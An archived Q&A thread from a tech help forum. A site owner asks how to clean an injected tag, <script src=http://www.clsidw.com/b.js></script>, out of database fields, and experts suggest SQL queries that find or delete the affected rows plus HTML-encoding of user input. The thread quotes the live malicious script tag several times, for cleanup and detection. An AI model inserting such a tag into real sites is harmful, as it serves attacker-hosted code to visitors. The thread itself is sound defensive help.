Solved

Need to remove an 'unauthorized' script from database fields - help/suggestions

Posted on 2008-06-16
12
448 Views
Last Modified: 2013-11-15
Here's the deal, som jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
0
Comment
Question by:bishopandsix
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 6
  • 5
12 Comments
 
LVL 25

Expert Comment

by:Tomas Helgi Johannsson
ID: 21798262
        HI!

Have you tried Toad for MySQL (www.toadsoft.com) ?
It's free and very good DBA tool to make changes to your database.

What you can do is do an update on each table by and put a empty string in stead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUM TEXT, LONG TEXT) or BLOB fields  it might be a little more trickier.
What you can do is use mysqldump to dump the database(s) to an sql file and use
texteditor (like WordPad/Notepad if you use WIndows) to search and replace the script text with blanks
and then restore the database with the altered backup sql file.
See the manual for further info
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798294
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


0
 

Author Comment

by:bishopandsix
ID: 21798300
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
0
Windows Server 2016: All you need to know

Learn about Hyper-V features that increase functionality and usability of Microsoft Windows Server 2016. Also, throughout this eBook, you’ll find some basic PowerShell examples that will help you leverage the scripts in your environments!

 
LVL 7

Expert Comment

by:Zippit
ID: 21798303
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
0
 

Author Comment

by:bishopandsix
ID: 21798370
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
0
 

Author Comment

by:bishopandsix
ID: 21798392
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.
0
 
LVL 7

Accepted Solution

by:
Zippit earned 500 total points
ID: 21798790
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798801

userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said then done.
0
 

Author Comment

by:bishopandsix
ID: 21799232
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21807259
what product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
0
 

Author Comment

by:bishopandsix
ID: 21808309
Absolutely no  idea what product. I'll get with my host in the morning and ask.
0
 

Author Closing Comment

by:bishopandsix
ID: 31467804
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.
0

Featured Post

Comparison of Amazon Drive, Google Drive, OneDrive

What is Best for Backup: Amazon Drive, Google Drive or MS OneDrive? In this free whitepaper we look at their performance, pricing, and platform availability to help you decide which cloud drive is right for your situation. Download and read the results of our testing for free!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

In this series, we will discuss common questions received as a database Solutions Engineer at Percona. In this role, we speak with a wide array of MySQL and MongoDB users responsible for both extremely large and complex environments to smaller singl…
Your data is at risk. Probably more today that at any other time in history. There are simply more people with more access to the Web with bad intentions.
Via a live example, show how to extract information from SQL Server on Database, Connection and Server properties
Using examples as well as descriptions, and references to Books Online, show the different Recovery Models available in SQL Server and explain, as well as show how full, differential and transaction log backups are performed

688 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question